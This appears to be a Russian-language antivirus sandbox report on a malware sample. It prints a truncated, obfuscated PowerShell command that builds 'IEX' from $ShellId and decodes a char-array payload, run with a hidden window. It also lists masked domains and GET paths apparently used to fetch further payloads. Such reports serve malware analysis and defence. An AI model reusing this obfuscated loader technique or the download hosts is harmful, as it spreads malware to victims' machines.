Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $ShelLiD[1]+$sHElLID[13]+'X')(( [chAR[]]( 117,28, 37 , 3 , 9, 59 , 113 ,108, 113 , 63,52,38 ,124 , 62, 51,59,52, 50 ,37,113 ,35 , 48,63, 53,62 , 60 , 106, 117 , 56,28,50 ,20, 8, 3 , 113 ,10...
Сетевая активность
Подключается к
- 'po#####tworkshop.com':80
- 'hu###omains.com':443
- 'nv###al.co.za':80
TCP
Запросы HTTP GET
- http://po#####tworkshop.com/kDUOc4r/
- http://www.nv###al.co.za/3psS3g/
Другие
- 'hu###omains.com':443
UDP
- DNS ASK po#####tworkshop.com
- DNS ASK hu###omains.com
- DNS ASK bo#####.goyalmri.com
- DNS ASK nv###al.co.za
- DNS ASK so###icro.net
- DNS ASK ma#######digitalmacae.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $ShelLiD[1]+$sHElLID[13]+'X')(( [chAR[]]( 117,28, 37 , 3 , 9, 59 , 113 ,108, 113 , 63,52,38 ,124 , 62, 51,59,52, 50 ,37,113 ,35 , 48,63, 53,62 , 60 , 106, 117 , 56,28,50 ,20, 8, 3 , 113 ,10...' (со скрытым окном)
